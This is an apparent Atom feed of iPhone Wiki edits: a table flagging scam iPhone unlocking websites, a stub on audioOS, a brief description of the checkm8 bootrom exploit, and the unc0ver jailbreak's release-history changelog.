| unlock-apple-iphone.com || Sells unspecified jailbreaking + unlocking software for $29.99&lt;br /&gt;
|-&lt;br /&gt;
| unlock-appleiphone.com || Sells IMEI unlocks for ANY carrier (including Singtel, which is factory unlocked, and including Sprint, which is nearly impossible, and certainly not done for that price) for $29.95&lt;br /&gt;
|-&lt;br /&gt;
| unlock-ijailbreak.net || Added a letter to the URL, otherwise it's the same site as unlock-jailbreak.net&lt;br /&gt;
|-&lt;br /&gt;
| unlock-iphone.info || Fake. Claims that donating will expedite your request.&amp;lt;!-- Not to mention the request form isn't even an HTML &amp;lt;form&amp;gt;. The &amp;quot;submit&amp;quot; button is just a link. --&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| unlock-jailbreak.net || Sells unspecified unlocking software for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| unlock-jailbreak-iphone.com || Sells unspecified jailbreaking + unlocking software for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| unlock-the-iphone.com || Sells unspecified jailbreaking + unlocking software for $29.95, $37.95, or $49&lt;br /&gt;
|-&lt;br /&gt;
| unlock4iphone.com || Sells unspecified unlocking software for $29.99&lt;br /&gt;
|-&lt;br /&gt;
| unlockimeiiphone.com || Sells unspecified jailbreaking + unlocking tool for $19.95&lt;br /&gt;
|-&lt;br /&gt;
| unlockingfox.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| unlockiphone.net || Sells unspecified jailbreaking + unlocking tool&lt;br /&gt;
|-&lt;br /&gt;
| unlockiphone.org || Sells unspecified unlocking software for $24.95&lt;br /&gt;
|-&lt;br /&gt;
| unlockiphoneios5.com || Sells unspecified jailbreaking + unlocking software for $14.95&lt;br /&gt;
|-&lt;br /&gt;
| unlockiphonenow.org || Sells unspecified jailbreaking + unlocking software for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| unlockiphonepro.com || Sells unspecified jailbreaking + unlocking software for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| unlockjailbreaktool.com || Sells unspecified jailbreaking + unlocking software for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| unlockmecentral.com || Sells jailbreaking &amp;quot;membership&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| ultrasn0wtool.com || Claims to unlock via a GUI app&lt;br /&gt;
|-&lt;br /&gt;
| ziphone.org || Directs visitors to iphone-unlocker-pro.com&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=AudioOS&amp;diff=103489</id>
		<title>AudioOS</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=AudioOS&amp;diff=103489"/>
		<updated>2020-06-25T23:38:14Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}&lt;br /&gt;
'''audioOS''' is the operating system used by the [[HomePod]]. It is a forked version of tvOS as of 13.4 (prior to 13.4, it was a forked version of iOS). &lt;br /&gt;
&lt;br /&gt;
The first version of audioOS is marketed as 11.0. An OTA update was released before the HomePod's launch as 11.0.2. OTAs with broadened firmware requirements are prefixed with &amp;quot;9.9.&amp;quot; (example: 9.9.11.0.2).&lt;br /&gt;
&lt;br /&gt;
The shell for audioOS is called by &amp;quot;SoundBoard&amp;quot; (instead of [[SpringBoard]]), although it has no user interface. Most frameworks and applications are replaced with HomePod equivalents that are prefixed with &amp;quot;Air.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
{{stub|software}}&lt;br /&gt;
[[Category:Firmware]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Checkm8_Exploit&amp;diff=103262</id>
		<title>Checkm8 Exploit</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Checkm8_Exploit&amp;diff=103262"/>
		<updated>2020-06-10T15:15:48Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added that checkm8 also supports Haywire and Homepod&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}&lt;br /&gt;
The '''checkm8 exploit''' is a [[bootrom]] exploit with a CVE ID of CVE-2019-8900 used to run unsigned code on iOS, iPadOS, tvOS, watchOS, bridgeOS, audioOS, and Haywire devices with processors between an A5 and an A11, a S1P and a S3, a S5L8747, and a T2 (and thereby [[jailbreak]] it). Jailbreaks based on checkm8 are [[semi-tethered jailbreak]]s as the exploit works by taking advantage of a heap overflow in the USB DFU stack.&lt;br /&gt;
&lt;br /&gt;
[[ipwndfu]] and [[checkra1n]] are currently the main tools capable of using the checkm8 exploit. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* [https://habr.com/en/company/dsec/blog/472762/ Technical analysis of the checkm8 exploit]&lt;br /&gt;
* [https://www.kb.cert.org/vuls/id/941987/ Apple devices vulnerable to arbitrary code execution in SecureROM]&lt;br /&gt;
* [https://news.ycombinator.com/item?id=22849837 https://news.ycombinator.com/item?id=22849837]&lt;br /&gt;
* [https://arstechnica.com/information-technology/2019/09/developer-of-checkm8-explains-why-idevice-jailbreak-exploit-is-a-game-changer Developer of Checkm8 explains why iDevice jailbreak exploit is a game changer]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Exploits]]&lt;br /&gt;
[[Category:Bootrom Exploits]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Unc0ver&amp;diff=103260</id>
		<title>Unc0ver</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Unc0ver&amp;diff=103260"/>
		<updated>2020-06-10T13:31:00Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added that unc0ver supports iOS 13.5.5~b1&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}{{Infobox software&lt;br /&gt;
 | name                   = unc0ver&lt;br /&gt;
 | title                  = unc0ver&lt;br /&gt;
 | developer              = [https://twitter.com/pwn20wnd pwn20wnd]&amp;lt;br /&amp;gt;[https://twitter.com/sbingner sbingner]&lt;br /&gt;
 | released               = {{Start date|2018|10|13|df=yes}}&lt;br /&gt;
 | latest release version = v5.2.0&lt;br /&gt;
 | latest release date    = {{Start date and age|2020|06|09|df=yes}}&lt;br /&gt;
 | operating system       = iOS&lt;br /&gt;
 | language               = English&lt;br /&gt;
 | genre                  = Jailbreaking&lt;br /&gt;
 | website                = [https://unc0ver.dev The Official Website]&amp;lt;br /&amp;gt;[https://www.reddit.com/9nwxei/ The Reddit thread]&amp;lt;br /&amp;gt;[https://github.com/pwn20wndstuff/Undecimus The GitHub repo]&lt;br /&gt;
}}&lt;br /&gt;
'''unc0ver''' is a [[semi-untethered jailbreak]] for all devices running iOS 11.0 through 13.5.5~b1, (excluding iOS 12.3-12.3.2, 12.4.1-12.4.7, and 13.5.1)&lt;br /&gt;
&lt;br /&gt;
In order to download the latest IPA, download links from the README section has been moved to the releases section of the repository (you can find this by looking under the colored bars where you can find the releases page which is in the middle, alongside branches and contributors).&lt;br /&gt;
==Release History==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Version&lt;br /&gt;
! Date&lt;br /&gt;
! Changes&lt;br /&gt;
|-&lt;br /&gt;
| RC1&lt;br /&gt;
| {{date|2018|10|13}}&lt;br /&gt;
|&lt;br /&gt;
* Initial release&lt;br /&gt;
|-&lt;br /&gt;
| RC2&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | {{date|2018|10|14}}&lt;br /&gt;
|&lt;br /&gt;
* Add the Dynastic repo by default&lt;br /&gt;
* Fix a bug in firmware checker&lt;br /&gt;
|-&lt;br /&gt;
| RC3&lt;br /&gt;
|&lt;br /&gt;
* Add a switch to manually enable restoring RootFS&lt;br /&gt;
* Stop erasing user preferences when restoring RootFS&lt;br /&gt;
* Fix bugs&lt;br /&gt;
|-&lt;br /&gt;
| RC4&lt;br /&gt;
|&lt;br /&gt;
* Add a label to display the uptime&lt;br /&gt;
* Add a label to display the app's version number&lt;br /&gt;
* Spawn to the PATH&lt;br /&gt;
* Stop bundling system fonts&lt;br /&gt;
|-&lt;br /&gt;
| RC5&lt;br /&gt;
|&lt;br /&gt;
* Run videosubscriptionsd in the jailed state&lt;br /&gt;
* Fix a bug in firmware and update checker&lt;br /&gt;
|-&lt;br /&gt;
| RC6&lt;br /&gt;
|&lt;br /&gt;
* Start logging again&lt;br /&gt;
* Improve update checker&lt;br /&gt;
* Fix multi_path&lt;br /&gt;
|-&lt;br /&gt;
| RC7&lt;br /&gt;
| {{date|2018|10|17}}&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug in RootFS Restore and multi_path&lt;br /&gt;
|-&lt;br /&gt;
| RC8&lt;br /&gt;
| {{date|2018|10|18}}&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug in RootFS Remount&lt;br /&gt;
* Add a work in progress warning for some firmwares &lt;br /&gt;
|-&lt;br /&gt;
| RC9&lt;br /&gt;
| {{date|2018|10|19}}&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug in RootFS Remount&lt;br /&gt;
* Add even more detailed error messages&lt;br /&gt;
* Add a switch to increase the memory limit to improve the stability&lt;br /&gt;
* Improve the compatibility layer to work correctly with some tweaks that were specifically made for the other jailbreaks&lt;br /&gt;
|-&lt;br /&gt;
| v1&lt;br /&gt;
| {{date|2018|10|20}}&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug in RootFS Restore and Remount&lt;br /&gt;
* Make the settings tab match with the rest of the UI&lt;br /&gt;
* Fix bugs&lt;br /&gt;
|-&lt;br /&gt;
| v1.0.1&lt;br /&gt;
| {{date|2018|10|21}}&lt;br /&gt;
|&lt;br /&gt;
* Disable the RootFS Restore for the unstable versions&lt;br /&gt;
|-&lt;br /&gt;
| v1.0.2&lt;br /&gt;
| {{date|2018|10|22}}&lt;br /&gt;
|&lt;br /&gt;
* Enable and fix the RootFS Restore for all versions&lt;br /&gt;
|-&lt;br /&gt;
| v1.0.3&lt;br /&gt;
| {{date|2018|10|23}}&lt;br /&gt;
|&lt;br /&gt;
* Fix the beta firmwares&lt;br /&gt;
|-&lt;br /&gt;
| v1.1&lt;br /&gt;
| {{date|2018|10|27}}&lt;br /&gt;
|&lt;br /&gt;
* Automatically select the best exploit&lt;br /&gt;
* Rewrite the versions checker&lt;br /&gt;
* Improve assertion&lt;br /&gt;
* Show the code which has failed in the error messages&lt;br /&gt;
* Improve memory management&lt;br /&gt;
* Optimize and clean up the code&lt;br /&gt;
* Fix the Storage settings&lt;br /&gt;
* Switch to a new technique to disable auto updates&lt;br /&gt;
* Remove so much useless logging&lt;br /&gt;
* Only set the boot-nonce if the switch is on without checking if it exists or not&lt;br /&gt;
* Log offsets&lt;br /&gt;
* Remove static sleeps to improve the speed&lt;br /&gt;
* Fix series of bugs and leave no known bug&lt;br /&gt;
|-&lt;br /&gt;
| v1.1.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2018|11|03}}&lt;br /&gt;
|&lt;br /&gt;
* Add a label to show the ECID&lt;br /&gt;
* Add a button to open the source code&lt;br /&gt;
* Improve auto layout&lt;br /&gt;
* Fix various bugs within RootFS interaction, Icon cache refresher, Version checker, Exploit selector, jailbreak state detector and others&lt;br /&gt;
|-&lt;br /&gt;
| v1.1.2&lt;br /&gt;
|&lt;br /&gt;
* Improve auto layout and code&lt;br /&gt;
* Significantly improve Empty_List (VFS) exploit&lt;br /&gt;
* Slightly improve Multi_Path (MPTCP)&lt;br /&gt;
|-&lt;br /&gt;
| v1.1.3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2018|11|06}}&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug in starting jailbreakd&lt;br /&gt;
|-&lt;br /&gt;
| v1.1.4&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug in finding offsets&lt;br /&gt;
|-&lt;br /&gt;
| v2.0&lt;br /&gt;
| {{date|2018|11|30}}&lt;br /&gt;
|&lt;br /&gt;
* Initial Cydia Substrate support&lt;br /&gt;
* OTA upgrades for the jailbreak patches from Cydia without rebooting&lt;br /&gt;
* A new button to restart SpringBoard from the jailed state&lt;br /&gt;
* A switch to (re)install OpenSSH&lt;br /&gt;
* A switch to reinstall Cydia&lt;br /&gt;
* A switch to restart backboardd only so that you can jailbreak with broken tweaks&lt;br /&gt;
* Fix and update bootstrap&lt;br /&gt;
* Fix for the jailbreakd error&lt;br /&gt;
* Battery life fixes&lt;br /&gt;
* ELOD (Electra Loop Of Death) mitigations&lt;br /&gt;
* Improve the speed of system reload&lt;br /&gt;
* Fixes for countless bugs&lt;br /&gt;
* Enable Restart and Restart SpringBoard buttons on iOS 11.4 - 11.4.1 (Jailbreak itself doesn't work on iOS 11.4 - 11.4.1)&lt;br /&gt;
* Improve the reliability of the Restart button&lt;br /&gt;
* Fix the broken multi_path entitlement check&lt;br /&gt;
* Add the compatibility layer for the other jailbreaks back to fix the apps like iCleaner&lt;br /&gt;
* Fix the famous snapshot creation bug&lt;br /&gt;
* Add a button to manually reset the logs instead of automatically resetting them when the diagnostics button is tapped&lt;br /&gt;
* Fix the trust cache injection bug&lt;br /&gt;
|-&lt;br /&gt;
| v2.0.1&lt;br /&gt;
| {{date|2018|12|02}}&lt;br /&gt;
|&lt;br /&gt;
* The official release of v2.0 with a version number bump to make tracking versions easier&lt;br /&gt;
|-&lt;br /&gt;
| v2.0.2&lt;br /&gt;
| {{date|2018|12|06}}&lt;br /&gt;
|&lt;br /&gt;
* Fix bugs in the app&lt;br /&gt;
* Improve the the speed of the jailbreak&lt;br /&gt;
* Update bundled resources&lt;br /&gt;
* Switch to a new technique for blocking revokes&lt;br /&gt;
|-&lt;br /&gt;
| v2.1&lt;br /&gt;
| {{date|2018|12|14}}&lt;br /&gt;
|&lt;br /&gt;
* Make internal changes to make fixing issues easier&lt;br /&gt;
* Add T-Mobile support for the revoke disabler&lt;br /&gt;
* Make re-jailbreaking without restarting possible &lt;br /&gt;
* Make switching from Electra possible without restoring RootFS &lt;br /&gt;
* Update bundled resources&lt;br /&gt;
* Fix a bug in extracting bootstrap&lt;br /&gt;
* Only quit the app if the error is fatal&lt;br /&gt;
* Fix a bug in loading daemons&lt;br /&gt;
* Make the jailbreaking process faster and more stable&lt;br /&gt;
* Add more feedback to the user interface&lt;br /&gt;
* Other fixes and improvements&lt;br /&gt;
* Fix a bug in extracting bootstrap that was introduced with the previous build&lt;br /&gt;
* Fix a bug in installing Cydia that was introduced with the previous build&lt;br /&gt;
* Fix a bug in switching from Electra without restoring RootFS&lt;br /&gt;
* Update &amp;quot;No Tweaks&amp;quot; mode to support new &amp;quot;Disable Loader&amp;quot; option in Cydia Substrate&lt;br /&gt;
* Added the ability to completely disable jailbreakd when Substrate is installed via a future Cydia update.&lt;br /&gt;
* Add internal support for completely disabling jailbreakd with a Resources update&lt;br /&gt;
* Make a special alert for the exploit error to make it more clear&lt;br /&gt;
* Automatically reboot when the user taps &amp;quot;OK&amp;quot; on the exploit error&lt;br /&gt;
* Improve the version checker&lt;br /&gt;
* Fix a really weird bug in the system that would stop Cydia Substrate from loading tweaks although this bug isn't caused by the tool&lt;br /&gt;
* Make the UI support different font sizes or styles (E.g. Bold Text)&lt;br /&gt;
* Add the initial localization support (No localizations included yet)&lt;br /&gt;
* Reduce the number of stages&lt;br /&gt;
* Fix a bug in installing OpenSSH&lt;br /&gt;
* Switch to Sam Bingner's new superb trust cache injector thereby enable support for dual-hash signatures&lt;br /&gt;
* Don't update the hosts file unless it is needed&lt;br /&gt;
* Unblock Saurik's repo if it is blocked&lt;br /&gt;
* Reduce the number of stages&lt;br /&gt;
* Remove unnecessary checks&lt;br /&gt;
* Avoid applying unnecessary kernel patches unless they are needed&lt;br /&gt;
* Make sure that the system snapshot was correctly mounted before using it&lt;br /&gt;
* Unmount the system snapshot after root filesystem snapshot bypass or restore&lt;br /&gt;
* Simplify the credits view&lt;br /&gt;
* Don't do unnecessary logging&lt;br /&gt;
* Improve empty_list (vfs) exploit's success rate&lt;br /&gt;
* Fix runCommand to correctly log&lt;br /&gt;
* Don't run jailbreakd if Cydia Substrate is installed&lt;br /&gt;
* Don't set the boot nonce if it already is&lt;br /&gt;
* Make obvious internal changes&lt;br /&gt;
* Make jailbreaking obviously faster&lt;br /&gt;
* Fix a brutal kernel memory leak&lt;br /&gt;
* Fix shutdown or halt leading to a reboot&lt;br /&gt;
* Fix a logic error that would disable jailbreak patches when Substrate was installed but Load Daemons was disabled that was introduced with the previous build&lt;br /&gt;
* Fix a bug in RootFS Restore for iOS 11.0 - 11.2.6 that was introduced with the previous build&lt;br /&gt;
* Fix a bug in trust cache injection&lt;br /&gt;
* Improve update checker&lt;br /&gt;
* Make jailbreaking obviously faster&lt;br /&gt;
* Fix a bug in RootFS Restore for iOS 11.0 - 11.2.6 that would cause it to not work on some devices&lt;br /&gt;
* Fix a bug in update checker&lt;br /&gt;
* Fix a bug in the posix_spawn wrapper that would cause weird issues on some devices (Known for causing the &amp;quot;(24/40)&amp;quot; issue)&lt;br /&gt;
|-&lt;br /&gt;
| v2.1.1&lt;br /&gt;
| {{date|2019|01|05}}&lt;br /&gt;
|&lt;br /&gt;
* Make jailbreaking faster&lt;br /&gt;
* Don't error out if the hosts file doesn't exist&lt;br /&gt;
* Ignore dependencies in Cydia reinstallation&lt;br /&gt;
* Fix false positives&lt;br /&gt;
* Clean Cydia's user data in RootFS Restore&lt;br /&gt;
* Fix a snapshot name confusion bug in RootFS Restore&lt;br /&gt;
* Fix another bug in RootFS Restore&lt;br /&gt;
* Improve memory management&lt;br /&gt;
* Use less external binaries&lt;br /&gt;
* Completely clean Cydia's user data in RootFS Restore&lt;br /&gt;
|-&lt;br /&gt;
| v2.1.3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2019|01|26}}&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug in patch finder that affected the shenanigans finder on specific iOS versions&lt;br /&gt;
* Switch to a better versioning system&lt;br /&gt;
* Make downgrading from v2.2.0 possible (Unreleased as of now)&lt;br /&gt;
|-&lt;br /&gt;
| v2.1.4&lt;br /&gt;
|&lt;br /&gt;
*Decrease the app's size from 63MBs to 22MBs by optimizing assets&lt;br /&gt;
|-&lt;br /&gt;
| v2.2.0&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | {{date|2019|01|30}}&lt;br /&gt;
|&lt;br /&gt;
* Install Cydia Substrate if it's not already installed&lt;br /&gt;
* Validate Cydia Substrate files and reinstall it if the validation fails&lt;br /&gt;
* Fix a bug in switching from Electra without RootFS Restore&lt;br /&gt;
* Clean up the kernel data structure patches to improve the performance and the security&lt;br /&gt;
* Remove Substitute support files in the filesystem&lt;br /&gt;
* Remove Substitute support links in the filesystem&lt;br /&gt;
* Uninstall Electra's Cydia Upgrade Helper if it is present&lt;br /&gt;
* Improve preference management&lt;br /&gt;
* Switch to a more efficient versioning system&lt;br /&gt;
* Use a new implementation of the system's libarchive to extract the bootstrap to increase the perfomance&lt;br /&gt;
* Update rsync to increase the performance and the stability of RootFS Restore&lt;br /&gt;
* Improve memory management&lt;br /&gt;
* Re-Extract bootstrap if it was extracted on a different iOS version&lt;br /&gt;
* Credit Saurik in the credits view for Cydia and Substrate&lt;br /&gt;
* Avoid writing to the disk when not necessary&lt;br /&gt;
* Add a verbose log window for the jailbreak&lt;br /&gt;
* Make the exploits slightly faster&lt;br /&gt;
* Make the jailbreak significantly faster and more performant&lt;br /&gt;
* Jailbreak itself now takes almost less than a second run (Exploit not included)&lt;br /&gt;
* Fix a bug in patch finder that would cause the sandbox escape to fail on certain devices&lt;br /&gt;
* Fix theoretical bugs&lt;br /&gt;
* Improve assertion&lt;br /&gt;
* Performance improvements&lt;br /&gt;
* Fix a bug in logging&lt;br /&gt;
* Update bootstrap&lt;br /&gt;
* Enable overwriting files in the bootstrap extractor&lt;br /&gt;
* Fix switching from Electra without restoring root filesystem&lt;br /&gt;
* Fix certain error descriptions&lt;br /&gt;
* Fix RootFS Restore on certain devices&lt;br /&gt;
* Add a switch to hide the log window&lt;br /&gt;
* Decrease the app's size from 81MBs to 25MBs by optimizing assets&lt;br /&gt;
* Add a switch to reset Cydia cache on request&lt;br /&gt;
* Rewrite Cydia installation&lt;br /&gt;
* Install a local repo&lt;br /&gt;
* Remove bootstrap&lt;br /&gt;
* Hide the local APT repo from Cydia&lt;br /&gt;
|-&lt;br /&gt;
| v2.2.1&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug in installing Cydia / extracting bootstrap&lt;br /&gt;
|-&lt;br /&gt;
| v2.2.2&lt;br /&gt;
|&lt;br /&gt;
* Fully fix a bug in installing Cydia / extracting bootstrap&lt;br /&gt;
|-&lt;br /&gt;
| v2.2.3&lt;br /&gt;
| {{date|2019|01|31}}&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug with extracting rsync&lt;br /&gt;
|-&lt;br /&gt;
| v3.0.0&lt;br /&gt;
| {{date|2019|04|19}}&lt;br /&gt;
| &lt;br /&gt;
* Add support for iOS 12.0-12.1.2.&lt;br /&gt;
|-&lt;br /&gt;
| v3.0.1&lt;br /&gt;
| {{date|2019|04|23}}&lt;br /&gt;
| &lt;br /&gt;
* Iterate the proc list with proper data locks in Unrestrict to fix a possible race condition in the kernel (Important stability fix)&lt;br /&gt;
* Fix a typo in the app&lt;br /&gt;
* Fix a bug in logging&lt;br /&gt;
* Add iOS 12.1.3 - 12.2 support for the restart button&lt;br /&gt;
|-&lt;br /&gt;
| v3.1&lt;br /&gt;
| {{date|2019|05|23}}&lt;br /&gt;
| &lt;br /&gt;
* Rewrite the kernel patches from scratch to improve the stability and the reliability of the jailbreak&lt;br /&gt;
* Rewrite the preference management system from scratch to optimize the jailbreak&lt;br /&gt;
* Rewrite the diagnostics system from scratch to provide more useful information&lt;br /&gt;
* Rewrite unrestrict libary from scratch to improve the stability of the system after jailbreak&lt;br /&gt;
* Add support for switching from the other iOS 12 jailbreaks without restoring the root filesystem and losing data&lt;br /&gt;
* Make Unrestrict add sandbox exceptions for mach_lookup and mach_register&lt;br /&gt;
* Fix issues with processes looking up Substrate port on iOS 12 to fix stability and performance issues&lt;br /&gt;
* Fix support for the broken versions of RocketBootstrap and hid-support tweaks&lt;br /&gt;
* Fix the iMessage audio crash&lt;br /&gt;
* Fix FaceTime calls disappearing on some devices&lt;br /&gt;
* Fix Camera crash on some devices&lt;br /&gt;
* Update the local APT repo to include the latest updates from the Elucubratus repository, including the updated uikittools with rewritten uicache and sbreload commands to make refreshing the icon cache and reloading the SpringBoard significantly faster when installing packages from Cydia&lt;br /&gt;
* Refresh the icon cache during the root filesystem restore to fix jailbreak apps staying on the home screen after restoring the root filesystem&lt;br /&gt;
* Update mobilesubstrate to version 0.9.7033 to disable loader in the securityd daemon to fix a freeze issue on iOS 12&lt;br /&gt;
* Significantly improve the reliability of the jailbreak when using the machswap or the machswap2 exploit&lt;br /&gt;
* Wait for the user to tap OK on the jailbreak completed alert before respringing the device&lt;br /&gt;
* Improve the jailbreak's self-repairability feature&lt;br /&gt;
* Add a progress HUD to display the status of the jailbreak process&lt;br /&gt;
* Optimize the code&lt;br /&gt;
* Improve assertion&lt;br /&gt;
* Add error-specific error messages&lt;br /&gt;
* Display info about the device on launch&lt;br /&gt;
* Clean up logging&lt;br /&gt;
* Reconfigure the &amp;quot;Reload System Daemons&amp;quot; and &amp;quot;Enable get-task-allow&amp;quot; preferences&lt;br /&gt;
* Make &amp;quot;Enable get-task-allow&amp;quot; a default option&lt;br /&gt;
|-&lt;br /&gt;
| v3.1.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2019|05|24}}&lt;br /&gt;
| &lt;br /&gt;
* Fix running root filesystem restore when not in the jailbroken state on iOS 11&lt;br /&gt;
* Add an option to automatically restart the SpringBoard once the jailbreak is done instead of waiting for the user to tap the OK button (Requested by a Redditor)&lt;br /&gt;
|-&lt;br /&gt;
| v3.1.2&lt;br /&gt;
| &lt;br /&gt;
* Fix a bug in the settings user interface on smaller devices&lt;br /&gt;
* Add an option to hide the progress HUD (Requested by a Redditor)&lt;br /&gt;
|-&lt;br /&gt;
| v3.1.3&lt;br /&gt;
| {{date|2019|05|28}}&lt;br /&gt;
| &lt;br /&gt;
* Fix a bug in updating the status&lt;br /&gt;
* Fix a logic bug in remounting the root filesystem (Addresses https://www.reddit.com/r/jailbreak/comments/btxqng/help_still_cant_jb_on_ios_1211_using_the_newest/)&lt;br /&gt;
* Make machswap and machswap2 not depend on stealing kernel's credentials to fix a possible reliability issue&lt;br /&gt;
* Update kernel patches to use a safer allocation method&lt;br /&gt;
* Fix missing information in the jailbreak completed notice&lt;br /&gt;
* Fix false information in the jailbreak completed notice&lt;br /&gt;
|-&lt;br /&gt;
| v3.2&lt;br /&gt;
| {{date|2019|06|01}}&lt;br /&gt;
| &lt;br /&gt;
* Redesign the user interface (https://twitter.com/HiMyNameIsUbik/status/1134938278489182208)&lt;br /&gt;
* Add dark mode for the user interface&lt;br /&gt;
* Add info buttons for the options&lt;br /&gt;
* Increase the reliability of the jailbreak with the machswap and machswap2 exploits&lt;br /&gt;
* Update jailbreak-resources to fix an issue with the CS_DEBUGGED option&lt;br /&gt;
|-&lt;br /&gt;
| v3.2.1&lt;br /&gt;
| {{date|2019|06|02}}&lt;br /&gt;
| &lt;br /&gt;
* Fix several typos in the app&lt;br /&gt;
* Update the bundled uikittools&lt;br /&gt;
* Ignore refresh icon cache failures unless they are actually fatal&lt;br /&gt;
|-&lt;br /&gt;
| v3.3.0&lt;br /&gt;
| {{date|2019|07|14}}&lt;br /&gt;
| &lt;br /&gt;
* Add the Sock Puppet exploit for iOS 12.0-12.2 support on A8X-A11 devices&lt;br /&gt;
* Remove the empty_list and multi_path exploits&lt;br /&gt;
* Replace the kernel exploit segmented switch with picker view&lt;br /&gt;
* Add code substitution platform picker view&lt;br /&gt;
|-&lt;br /&gt;
| v3.3.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2019|07|16}}&lt;br /&gt;
| &lt;br /&gt;
* Improve the speed of the jailbreak process by a few seconds&lt;br /&gt;
* Fix a bug in dark mode on the iPads&lt;br /&gt;
|-&lt;br /&gt;
| v3.3.2&lt;br /&gt;
| &lt;br /&gt;
* Fix a bug in finding kernel offsets on iOS 11&lt;br /&gt;
|-&lt;br /&gt;
| v3.3.3&lt;br /&gt;
| {{date|2019|07|18}}&lt;br /&gt;
| &lt;br /&gt;
* Fix the Sock Puppet kernel exploit on iOS 11&lt;br /&gt;
* Fix the Voucher Swap exploit's compatibility status with iPad Air 2 and iPad Mini 4 on iOS 11&lt;br /&gt;
|-&lt;br /&gt;
| v3.3.4&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | {{date|2019|07|19}}&lt;br /&gt;
| &lt;br /&gt;
* Add the Sock Port exploit by [https://twitter.com/jakeashacks @jakeashacks] for iOS 11.0-12.1.4 on A7-A9X devices&lt;br /&gt;
|-&lt;br /&gt;
| v3.3.5&lt;br /&gt;
| &lt;br /&gt;
* Fix a reliability bug in Sock Port&lt;br /&gt;
* Fix Sock Puppet on A8X&lt;br /&gt;
|-&lt;br /&gt;
| v3.3.6&lt;br /&gt;
| &lt;br /&gt;
* Fix Sock Port failing on 4K devices&lt;br /&gt;
|-&lt;br /&gt;
| v3.3.7&lt;br /&gt;
| &lt;br /&gt;
* Improve the reliability of the Sock Port kernel exploit on 4K devices&lt;br /&gt;
|-&lt;br /&gt;
| v3.3.8&lt;br /&gt;
| {{date|2019|07|22}}&lt;br /&gt;
| &lt;br /&gt;
* Use the rewritten SockPort 2.0 exploit with ~100% reliability, ~100 milliseconds run time and support for all devices on iOS 11.0-12.2 (12.1.3-12.2 on A12-A12X excluded)&lt;br /&gt;
* Fix the jailbreak on iOS 12.2 iPhones and iPods&lt;br /&gt;
|-&lt;br /&gt;
| v3.4.0&lt;br /&gt;
| {{date|2019|07|23}}&lt;br /&gt;
| &lt;br /&gt;
* Replace the SockPort 2.0 exploit with the SockPuppet 2.0 exploit with better reliability and stability on older devices&lt;br /&gt;
|-&lt;br /&gt;
| v3.4.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2019|07|25}}&lt;br /&gt;
| &lt;br /&gt;
* Fix the sandbox swap error when using the exploits that are not SockPuppet&lt;br /&gt;
* Add the SockPort 1.5 exploit by [https://github.com/jakeajames @jakeajames] for A7-A9X devices (Reliability: ~95% from extensive testing)&lt;br /&gt;
* Disable the SockPuppet exploit on A7-A7X due to reliability issues&lt;br /&gt;
* Add iOS 12.3~b1 support to the jailbreak (Verified working on iPhone 5s)&lt;br /&gt;
* Fix a theoretical reliability bug with SockPuppet&lt;br /&gt;
|-&lt;br /&gt;
| v3.4.2&lt;br /&gt;
| &lt;br /&gt;
* Fix the SockPuppet kernel exploit not displaying on A8-A8X devices&lt;br /&gt;
|-&lt;br /&gt;
| v3.5.0&lt;br /&gt;
| {{date|2019|08|18}}&lt;br /&gt;
|&lt;br /&gt;
* Add iOS 12.4 support to the Sock Puppet (A8-A11) and Sock Port (A7-A7X) exploits&lt;br /&gt;
|-&lt;br /&gt;
| v3.5.1&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | {{date|2019|08|19}}&lt;br /&gt;
|&lt;br /&gt;
* Add the updated SockPuppet 3.0 exploit by @umanghere&lt;br /&gt;
* Remove the SockPort and SockPort2 exploits&lt;br /&gt;
